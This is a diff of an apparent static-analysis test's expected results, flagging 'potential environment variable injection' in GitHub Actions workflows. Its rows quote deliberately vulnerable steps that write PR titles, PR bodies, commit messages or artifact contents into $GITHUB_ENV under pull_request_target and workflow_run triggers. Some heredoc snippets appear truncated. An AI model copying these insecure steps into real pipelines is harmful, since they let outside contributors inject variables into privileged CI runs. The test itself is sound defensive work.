| .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/test13.yml:18:14:20:65 | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | .github/workflows/test13.yml:18:14:20:65 | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | .github/workflows/test13.yml:18:14:20:65 | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test13.yml:18:14:20:65 | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | .github/workflows/test13.yml:3:3:3:21 | pull_request_target | pull_request_target | -| .github/workflows/test13.yml:22:14:23:70 | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | .github/workflows/test13.yml:22:14:23:70 | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | .github/workflows/test13.yml:22:14:23:70 | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test13.yml:22:14:23:70 | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | .github/workflows/test13.yml:3:3:3:21 | pull_request_target | pull_request_target | -| .github/workflows/test14.yml:14:14:15:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:14:14:15:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:14:14:15:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test14.yml:14:14:15:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test16.yml:15:14:17:63 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | .github/workflows/test16.yml:10:9:15:6 | Uses Step | .github/workflows/test16.yml:15:14:17:63 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test16.yml:15:14:17:63 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | .github/workflows/test16.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/test16.yml:18:14:20:77 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | .github/workflows/test16.yml:10:9:15:6 | Uses Step | .github/workflows/test16.yml:18:14:20:77 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test16.yml:18:14:20:77 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | .github/workflows/test16.yml:4:3:4:14 | workflow_run | workflow_run | edges | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | provenance | Config | | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | Config | 
@@ -129,3 +92,40 @@ nodes | .github/workflows/test16.yml:15:14:17:63 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | semmle.label | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | | .github/workflows/test16.yml:18:14:20:77 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | semmle.label | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | subpaths +#select +| .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | .github/workflows/artifactpoisoning51.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/artifactpoisoning52.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/artifactpoisoning53.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | .github/workflows/test2.yml:3:3:3:14 | workflow_run | workflow_run | +| .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | .github/workflows/test3.yml:13:7:20:4 | Uses Step | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | .github/workflows/test3.yml:3:3:3:14 | workflow_run | workflow_run | +| .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | .github/workflows/test4.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | .github/workflows/test4.yml:15:19:15:56 | github.event.pull_request.title | .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | .github/workflows/test4.yml:19:19:19:56 | github.event.pull_request.title | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | .github/workflows/test4.yml:60:19:60:56 | github.event.pull_request.title | .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | .github/workflows/test5.yml:3:3:3:14 | workflow_run | workflow_run | +| .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | .github/workflows/test6.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | .github/workflows/test6.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | .github/workflows/test6.yml:16:19:16:56 | github.event.pull_request.title | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | .github/workflows/test6.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | .github/workflows/test6.yml:21:19:21:56 | github.event.pull_request.title | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | .github/workflows/test6.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test7.yml:16:9:24:35 | Uses Step | .github/workflows/test7.yml:9:9:16:6 | Uses Step | .github/workflows/test7.yml:16:9:24:35 | Uses Step | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test7.yml:16:9:24:35 | Uses Step | Uses Step | .github/workflows/test7.yml:4:5:4:16 | workflow_run | workflow_run | +| .github/workflows/test8.yml:31:14:33:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | .github/workflows/test8.yml:24:9:30:6 | Uses Step | .github/workflows/test8.yml:31:14:33:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test8.yml:31:14:33:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | .github/workflows/test8.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test8.yml:35:14:36:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | .github/workflows/test8.yml:24:9:30:6 | Uses Step | .github/workflows/test8.yml:35:14:36:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test8.yml:35:14:36:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | .github/workflows/test8.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test8.yml:38:14:39:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | .github/workflows/test8.yml:24:9:30:6 | Uses Step | .github/workflows/test8.yml:38:14:39:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test8.yml:38:14:39:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | .github/workflows/test8.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | .github/workflows/test9.yml:19:9:27:6 | Uses Step | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | .github/workflows/test9.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | .github/workflows/test10.yml:20:9:26:6 | Uses Step | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | cat foo/.github/java-config.env >> $GITHUB_ENV | .github/workflows/test10.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | .github/workflows/test11.yml:15:9:21:6 | Uses Step | .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | .github/workflows/test11.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:55:9:61:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
